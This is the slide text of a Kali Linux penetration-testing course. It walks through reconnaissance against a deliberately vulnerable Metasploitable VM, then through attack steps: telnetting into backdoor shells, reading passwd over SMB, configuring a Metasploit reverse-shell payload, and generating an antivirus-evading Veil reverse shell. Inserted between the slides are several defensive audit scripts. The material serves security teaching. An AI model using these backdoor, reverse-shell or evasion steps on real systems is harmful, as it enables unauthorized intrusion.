3. Welcome
Tony Godfrey is the CEO / Linux Consultant
of Falconer Technologies (est 2003) specializing in
Linux. He has written several articles on the body
of knowledge of security administration, is a
regular contributor to a variety of Linux
publications, and has written technical content for
Linux education nation-wide at the college level.
He also teaches topics covering Linux,
Network Security, Cisco routers, Cybercrime and
System Forensics.
5. Welcome
Side Note:
I put a lot of extra materials, websites, &
definitions in the "Notes" section of this PPT.
6. Overview of Presentation
Intro, Description, How used, Background
Extra Info, Kali in a Box, Raspberry PI
Tools, Overview, & Conclusion
Setting up the Environments
CLI 101 / Tools 101
Kali 101, 201, & 301
9. Who is Kali?
Kali the mother goddess despite her
fearful appearance, protects the good
against the evil. Unlike the other Hindu
deities her form is pretty scary and
formidable, intended to scare away the
demons both literally and figuratively!
Anu Yadavalli
11. What is Kali Linux?
Kali Linux is a Debian-derived Linux
distribution designed for digital forensics
and penetration testing. It is maintained
and funded by Offensive Security Ltd. It
was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the
rewrite of BackTrack, their previous
forensics Linux distribution.
12. BackTrack?
Kali Linux is the "rebirth" of BackTrack
Linux. This is a custom distribution
designed for security testing for all skill
levels from novice to expert. It is the
largest collection of wireless hacking,
server exploiting, web application
assessing, social-engineering tools available
in a single Linux distribution.
13. Developers - March 12, 2013
"Seven years of developing BackTrack
Linux has taught us a significant amount
about what we, and the security
community, think a penetration testing
distribution should look like. We've taken all
of this knowledge and experience and
implemented it in our 'next generation'
penetration testing distribution."
14. Developers - March 12, 2013
"After a year of silent development,
we are incredibly proud to announce the
release and public availability of 'Kali
Linux', the most advanced, robust, and
stable penetration testing distribution to
date.
Kali is a more mature, secure, and
enterprise-ready version of BackTrack
Linux."
15. Warning! Warning!
Kali Linux's developers would like
everyone to use Kali Linux. But Kali is a
Linux distribution specifically geared
towards professional penetration testing
and security auditing, and as such it is NOT
a recommended distribution for those
unfamiliar with Linux.
16. Hardware / Software
Kali likes its own dedicated hardware.
If you are learning about Kali and
penetration testing (Metasploitable) then a
virtualized environment may be a
consideration. VMware Player 5 works well;
set the RAM to 1 GB.
17. Hardware / Software
Kali recommends 10 GB for the initial
install, 512 MB RAM minimum, i386/AMD64,
CD/DVD / USB support.
Now… if "Veil" is installed (+10 GB) and
you do the updates/upgrades (+5 GB), and
don't forget the Alfa antenna.
22. Other guys? BackBox
BackBox is an Ubuntu-based
distribution developed to perform
penetration tests and security assessments.
It provides a minimal yet complete desktop
environment, thanks to its own software
repositories, which are always updated to
the latest stable versions of the most often
used and best-known ethical hacking tools.
23. Other guys? Pentoo
Pentoo is a Live CD/USB designed for
penetration testing and security
assessment. Based on Gentoo, it is
provided as a 32/64-bit installable
live CD. It features packet-injection-patched
wifi drivers, GPGPU cracking software, and
lots of tools for penetration testing and
security assessment.
24. Other guys? BlackBuntu
BlackBuntu is a distribution for
penetration testing which was specially
designed for security training students and
practitioners of information security.
Blackbuntu is a penetration testing
distribution with the GNOME Desktop
Environment. It's currently being built
using Ubuntu 10.10.
25. Other guys? EnGarde
EnGarde Secure Linux was designed to
support features suitable for individuals,
students, security enthusiasts, and those
wishing to evaluate the level of security and
ease of management available in Guardian
Digital enterprise products.
39. Kali in a box?
Do you want to run Kali on a tablet or phone?
http://www.kali.org/how-to/kali-linux-android-linux-deploy/
40. Kali in a box?
Basically…
1. Get a tablet
   1. Install "Linux Deploy"
   2. Install Samsung Kies on PC
   3. Tablet - USB Debugging ON
   4. Install SuperOneClick on PC
   5. Wait 5 minutes…
   6. Done
41. Kali + Nexus = NetHunter
Do you want to run Kali on a Nexus?
http://www.kali.org/kali-linux-nethunter/
43. Kali & Lifehacker
How to hack your own network and beef up
its security with Kali Linux
http://lifehacker.com/how-to-hack-your-own-network-and-beef-up-its-security-w-1649785071
48. Metasploitable?
Metasploitable is an intentionally
vulnerable Linux virtual machine. This VM
can be used to conduct security training,
test security tools, and practice common
penetration testing techniques.
The default login and password is
msfadmin:msfadmin
50. What's on the Drive?
- /books
  … Official Kali Guide
  … eForensics
  … Other published materials
- /media
  … 7-Zip, kali_iso, metasploitable doc,
  SD_formatter, Unetbootin, USB_installer,
  VMware, Win32_DiskImager
- /PPT
51. Legend
- We're going to type something
- We're going to make a note
- Might be a question?
- We're going to click on something
- Recon
- Attack
52. traceroute
- traceroute
Essentially, "tracert" in Windows
- traceroute -i eth0 <Target IP>
It displays the route (path) and measures transit delays of packets
across an Internet Protocol (IP) network
54. nmap
- nmap -p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
56. nmap
- nmap -sS -Pn -A <Target IP>
A security scanner used to discover hosts and services on a
computer network. "-sS" is a stealth scan, "-Pn" skips the ping scan,
and "-A" is O/S detection, services, service pack.
58. rpcinfo
- rpcinfo -p <Target IP>
A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
61. nikto
On Kali
- nikto -h <Target IP>
It's an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version-specific problems on over 270 servers.
72. veil
Kali has many built-in tools, but you
can always install even more (Debian-based).
You may always wish to add more,
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.
82. Getting Ready…
- Let's make a folder called kali_2015
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player
Let's make sure the virtual environments are working and can "ping"
each other
83. VMware Player
Press <CTRL><Alt> at the same time to
be released from the current virtual
environment. You can then do a normal
<Alt><Tab> to toggle between different
applications.
87. Kali V/E
- Login: root
- Password: password
- ifconfig
- Jot down the IP & Netmask
- route
- Jot down the Gateway
88. Kali V/E
Go to:
Applications > System Tools
> Preferences > System Settings
> Display > Resolution: ____
Then… [Apply]
89. Kali Updating
From the command line, type:
apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done
after a new installation.
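The lab-wiring steps of slides 82, 87 and 89 (note the IP and netmask from ifconfig, the gateway from route, then confirm the VMs can ping each other) as one POSIX sh script. This is an added example, not part of the deck and not a Kali tool; the function names (iface_addr, default_gateway, same_subnet, lab_check) are my own, and the ifconfig/route output it parses is constructed sample text, not captured from a real VM.

```shell
# Added example, not from the deck: the lab check of slides 82/87/89 as a
# script. The parsers read command output from stdin so they can be checked
# offline against the constructed samples below; lab_check runs the live
# commands on Kali. Function names are hypothetical, not Kali's.

# Print "address netmask" for one interface from `ifconfig` (net-tools style
# output of that era: "inet addr:10.0.2.15  Bcast:...  Mask:255.255.255.0").
iface_addr() {   # usage: ifconfig | iface_addr eth0
    awk -v want="$1" '
        /^[^ \t]/ { inblock = ($1 == want) }      # interface header line
        inblock && /inet addr:/ {
            for (i = 1; i <= NF; i++) {
                if (sub(/^addr:/, "", $i)) a = $i
                if (sub(/^Mask:/, "", $i)) m = $i
            }
            print a, m; exit
        }'
}

# Print the default gateway from `route -n` (the 0.0.0.0 destination row).
default_gateway() {   # usage: route -n | default_gateway
    awk '$1 == "0.0.0.0" && $2 != "0.0.0.0" { print $2; exit }'
}

# Dotted quad -> integer, so netmask arithmetic can be done in the shell.
ip2int() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# Succeed when two addresses share a subnet under the given mask; Kali and
# Metasploitable VMs on different VMware network modes usually fail this first.
same_subnet() {   # usage: same_subnet <ip1> <ip2> <netmask>
    [ $(( $(ip2int "$1") & $(ip2int "$3") )) -eq $(( $(ip2int "$2") & $(ip2int "$3") )) ]
}

# Live check on Kali: record our addressing, then ping the lab target once.
lab_check() {   # usage: lab_check <Target IP>
    target=$1
    set -- $(ifconfig | iface_addr eth0)
    gw=$(route -n | default_gateway)
    echo "kali: ip=$1 netmask=$2 gateway=$gw"
    same_subnet "$1" "$target" "$2" || echo "warning: $target is not on our subnet"
    if ping -c 1 -W 2 "$target" >/dev/null 2>&1; then
        echo "ok: $target answers ping"
    else
        echo "FAIL: $target does not answer ping (check the VMware network mode)"
        return 1
    fi
}

# Constructed sample output (not captured from a real VM) for offline checks.
SAMPLE_IFCONFIG='eth0      Link encap:Ethernet  HWaddr 00:0c:29:aa:bb:cc
          inet addr:192.168.57.10  Bcast:192.168.57.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0'
SAMPLE_ROUTE='Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.57.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
0.0.0.0         192.168.57.2    0.0.0.0         UG    0      0        0 eth0'

printf '%s\n' "$SAMPLE_IFCONFIG" | iface_addr eth0    # 192.168.57.10 255.255.255.0
printf '%s\n' "$SAMPLE_ROUTE" | default_gateway       # 192.168.57.2
```

On the Kali VM, `lab_check <Target IP>` does the whole of slide 87 plus the ping test of slide 82 in one go; the subnet warning catches the most common lab failure, one VM on NAT and the other on host-only.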
92. Legend
- We're going to type something
- We're going to make a note
- Might be a question?
- We're going to click on something
- Recon
- Attack
93. ping
- ping
Packet InterNet Groper
Port = 8
Establishes physical connectivity between two entities
- (from Kali) ping <Target IP>
Did it echo back?
94. top
- top
Tells us what services are running,
processes, memory allocation
Basically, a live system monitor
103. traceroute
- traceroute
Essentially, "tracert" in Windows
- traceroute -i eth0 <Target IP>
It displays the route (path) and measures transit delays of packets
across an Internet Protocol (IP) network
104. nmap
- nmap -p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
105. nmap
- nmap -sS -Pn -A <Target IP>
A security scanner used to discover hosts and services on a
computer network. "-sS" is a stealth scan, "-Pn" skips the ping scan,
and "-A" is O/S detection, services, service pack.
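The same nmap runs seen from the Metasploitable side, for slides 54/56 and 104/105: a SYN scan hits many ports on one host from one source in a short window, so logging SYN packets on the target and counting distinct destination ports per source makes it stand out. This is an added example, not from the deck; the iptables rule uses only standard LOG/limit options, the function names are mine, and the log lines are constructed in netfilter LOG format rather than captured from a real host.

```shell
# Added example, not from the deck: detect the port scan of slides 54/56 and
# 104/105 from the target's own kernel log. Function names are hypothetical.

# Log every new TCP connection attempt on the target VM (rate-limited so a
# full -p0-65535 sweep cannot flood syslog). Run once on the target as root.
enable_syn_logging() {
    iptables -A INPUT -p tcp --syn -m limit --limit 20/s \
        -j LOG --log-prefix "SYN: " --log-level 4
}

# Read kernel LOG lines on stdin; print "source distinct_ports" for every
# source that hit at least $1 distinct ports. One host touching seven or
# more ports in a few seconds is a scan, not normal traffic.
scan_sources() {   # usage: scan_sources <threshold> < /var/log/kern.log
    awk -v thr="$1" '
        /SYN: / && /PROTO=TCP/ {
            src = ""; dpt = ""
            for (i = 1; i <= NF; i++) {
                if (sub(/^SRC=/, "", $i)) src = $i
                else if (sub(/^DPT=/, "", $i)) dpt = $i
            }
            if (src != "" && dpt != "" && !seen[src, dpt]++) ports[src]++
        }
        END { for (s in ports) if (ports[s] >= thr) print s, ports[s] }' | sort
}

# Constructed log lines (not captured from a real host): 192.168.57.10 probes
# seven distinct ports (22 twice), 192.168.57.5 makes a single web request.
SAMPLE_LOG='Mar 12 10:01:01 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40001 DPT=21 SYN
Mar 12 10:01:01 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40001 DPT=22 SYN
Mar 12 10:01:01 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40002 DPT=22 SYN
Mar 12 10:01:01 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40001 DPT=23 SYN
Mar 12 10:01:02 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40001 DPT=25 SYN
Mar 12 10:01:02 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40001 DPT=80 SYN
Mar 12 10:01:02 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40001 DPT=111 SYN
Mar 12 10:01:02 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.10 DST=192.168.57.20 PROTO=TCP SPT=40001 DPT=139 SYN
Mar 12 10:01:05 meta kernel: SYN: IN=eth0 OUT= SRC=192.168.57.5 DST=192.168.57.20 PROTO=TCP SPT=51000 DPT=80 SYN'

printf '%s\n' "$SAMPLE_LOG" | scan_sources 5    # 192.168.57.10 7
```

The threshold is the only tuning knob: a web client opening a few ports (80, 443) never reaches it, while the -p0-65535 sweep on slide 104 produces thousands of distinct ports from the Kali address.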
106. rlogin (from Metasploitable)
- rlogin -l root <Target IP>
- whoami
- tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the
user to intercept and display TCP/IP and other packets being
transmitted or received over a network to which the computer is
attached.
107. rpcinfo
- rpcinfo -p <Target IP>
A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
108. showmount
- showmount -e <Target IP>
- showmount -a <Target IP>
It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.
109. telnet
- telnet <Target IP> 21
After '220...'
- user backdoored:)
- <CTRL><]>
- quit
Port 20/21 is FTP
110. telnet
- telnet <Target IP> 6200
After 'Escape character...',
- id;
- <CTRL><]>
- quit
Port 6200 - Oracle Notification Service remote port, Oracle Application Server
111. telnet
- telnet <Target IP> 6667
IRC (Internet Relay Chat)
Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm, ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.
112. telnet
- telnet <Target IP> 1524
After 'root@meta....',
- id
Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.
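The defender's counterpart to slides 106 through 112: everything the deck reaches from Kali (FTP on 21, rlogin, the RPC port mapper and NFS exports, the shells on 6200 and 1524, IRC on 6667) is a listening socket on the Metasploitable VM, and `netstat -ltn` on the VM itself lists them. This added script, not from the deck, reads that output and flags the listeners a hardened host should not have; the port list is assembled from the services the deck touches (513 for rlogin, 111 for rpcbind and 2049 for NFS are the standard ports for those services), the function name is mine, and the netstat text is a constructed sample.

```shell
# Added example, not from the deck: audit the target VM's own listeners for
# the services slides 106-112 reach from Kali. Function name is hypothetical.

# "port:reason" pairs, one per line, built from what the deck connects to.
SUSPECT_PORTS='21:ftp-cleartext-login(slide 109)
111:rpcbind-exposed(rpcinfo,slide 107)
513:rlogin-no-password(slide 106)
1524:backdoor-shell-port(slide 112)
2049:nfs-exported(showmount,slide 108)
6200:unexpected-shell-listener(slide 110)
6667:irc-trojan-port(slide 111)'

# Read `netstat -ltn` output on stdin; print "port reason" for each suspect
# port found in LISTEN state, lowest port first.
flag_listeners() {   # usage: netstat -ltn | flag_listeners
    awk -v list="$SUSPECT_PORTS" '
        BEGIN { n = split(list, pairs, "\n")
                for (i = 1; i <= n; i++) { split(pairs[i], kv, ":"); why[kv[1]] = kv[2] } }
        $1 ~ /^tcp/ && $NF == "LISTEN" {
            m = split($4, a, ":"); port = a[m]          # local address is host:port
            if (port in why && !done[port]++) print port, why[port]
        }' | sort -n
}

# Constructed `netstat -ltn` output (not captured from a real VM): a host
# with the deck's services up, plus ssh and http which are not flagged.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6200            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN
tcp6       0      0 :::2049                 :::*                    LISTEN'

printf '%s\n' "$SAMPLE_NETSTAT" | flag_listeners
```

Run on Metasploitable before and after the hands-on slides: the list should not change, and on any machine that is not a deliberately vulnerable lab VM it should be empty. Ports 1524 and 6200 in particular have no legitimate service behind them on a stock install, so a listener there is worth a `netstat -ltnp` to see which process owns it.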
116. smbclient
- smbclient //<Target IP>/tmp
Do you get the 'smb: >' prompt?
- cd rootfs
- cd etc
- more passwd
Do you get a list of all user accts?
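The walk on slide 116 from the tmp share into rootfs/etc/passwd only works when the share accepts anonymous (guest) access and the server follows a link inside the share back out to /; Samba's wide links setting governs exactly that. This added script, not from the deck, audits an smb.conf for those settings and shows a weak configuration beside a corrected one. The function name is mine and both configurations are constructed samples, not Metasploitable's actual file.

```shell
# Added example, not from the deck: find the smb.conf settings that make the
# slide 116 walk possible. Function name and both configs are hypothetical.

# Print one line per risky setting in an smb.conf read from stdin.
audit_smb_conf() {   # usage: audit_smb_conf < /etc/samba/smb.conf
    awk '
        /^[ \t]*\[/ {                                  # section header [name]
            sec = $0; gsub(/^[ \t]+|[ \t]+$/, "", sec)
            sec = tolower(substr(sec, 2, length(sec) - 2)); next
        }
        /^[ \t]*[#;]/ || !/=/ { next }                # comments and blank lines
        {
            eq = index($0, "="); key = substr($0, 1, eq - 1); val = substr($0, eq + 1)
            gsub(/^[ \t]+|[ \t]+$/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", val)
            key = tolower(key); val = tolower(val)
            if (sec == "global" && key == "wide links" && val == "yes")
                print "[global] wide links = yes: symlinks may point outside the share path"
            if (sec != "global" && key == "guest ok" && val == "yes")
                print "[" sec "] guest ok = yes: anonymous access to " sec
            if (sec != "global" && ((key == "writable" || key == "writeable") && val == "yes" || key == "read only" && val == "no"))
                print "[" sec "] writable: clients can create files and links in " sec
        }'
}

# Weak form (constructed): guest-writable share plus wide links.
WEAK_SMB_CONF='[global]
   workgroup = WORKGROUP
   security = share
   wide links = yes

[tmp]
   comment = scratch space
   path = /tmp
   guest ok = yes
   writable = yes
   browseable = yes'

# Corrected form (constructed): no guest access, read-only, no link escape.
HARDENED_SMB_CONF='[global]
   workgroup = WORKGROUP
   wide links = no
   follow symlinks = no

[tmp]
   comment = scratch space
   path = /tmp
   guest ok = no
   read only = yes
   valid users = @labusers'

printf '%s\n' "$WEAK_SMB_CONF" | audit_smb_conf       # three findings
printf '%s\n' "$HARDENED_SMB_CONF" | audit_smb_conf   # nothing
```

With the hardened file in place the smbclient command on slide 116 is refused before the prompt appears, and even an authenticated user cannot cd through a link out of /tmp.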
117. tcpdump
On Kali…
tcpdump -i eth0 src <Target IP>
On Metasploitable…
ping www.yahoo.com
open a Browser & go to CNN.com
118. netdiscover
On Kali
netdiscover -i eth0 -r <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly
developed for wireless networks without a DHCP server, when you are
wardriving. It can also be used on hub/switched networks.
119. nikto
On Kali
- nikto -h <Target IP>
It's an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version-specific problems on over 270 servers.
120. sqlmap
On Kali
sqlmap -u http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over database
servers.
121. Wasp Services
From Kali, open IceWeasel
- http://<Target IP>/
Research: Mutillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the
name) whose wingless females resemble large, hairy ants. Their common
name "velvet ant" refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.
122. Web Services
From Kali, open IceWeasel
- http://<Target IP>/
Research: Mutillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security
enthusiasts to pen-test and hack a web application
123. whatweb
From Kali
- whatweb <Target IP>
- whatweb -v <Target IP>
- whatweb -a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
125. From Kali - msfconsole
Presentation on Kali Linux
126. msfconsole
From Kali
- service postgresql start
- service metasploit start
- msfconsole
Let's fire up the database (PostgreSQL), start Metasploit, then start msfconsole.
We will then take a look at the built-in exploit tools
127. msfconsole
From [msf>] console
- help search
- show exploits
- search dns
"help search" shows all of the options, "show exploits" shows all the built-in
exploits in msfconsole, "search dns" will look for any DNS exploits.
128. msfconsole
From [msf>] console
- search Microsoft
- search diablo
- search irc
- search http
Let's try a few more to see what they do…
129. msfconsole
From [msf>] console, search for "unreal"
- info <exploit>
- use <exploit>
- show options
- LHOST, RHOST, LPORT, RPORT
135. msfconsole
From [msf>] console, (target: Win XP)
- set payload windows/shell_reverse_tcp
- show options
- set LHOST <Kali IP Address>
- set RHOST <Target IP Address>
142. recon-ng
Kali has many built-in tools, but you
can always install more (Debian-based).
You may also wish to add more,
such as recon-ng.
recon-ng
automated info gathering and
network reconnaissance.
143. recon-ng
Let's run recon-ng…
- cd /opt/recon-ng
- /usr/bin/python recon-ng
- show modules
- recon/hosts/gather/http/web/google_site
144. recon-ng
Let's run recon-ng…
- set DOMAIN <domain.com>
- run (…let this run awhile…)
- back (…previous level…)
- show modules
146. dmitry
If you want something more basic… dmitry
- dmitry -s <domain.com>
- It gives you site names & IPs
147. veil
Kali has many built-in tools, but you
can always install even more (Debian-based).
You may always wish to add more,
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.
148. veil
Let's run veil
- veil-evasion
- list (available payloads list)
- use 13 (powershell/VirtualAlloc)
- generate
149. veil
Let's run veil
- 1 (msfvenom)
- [ENTER] (accept default)
- Value for LHOST (Target IP)
- Value for LPORT (ex: 4000)
150. veil
Let's run veil
- Output name ("Squatch")
- It will store this new batch file in
the /usr/share/veil/output/source
folder. When the file is run from the target
machine, it will attempt to do a reverse
shell session with Kali.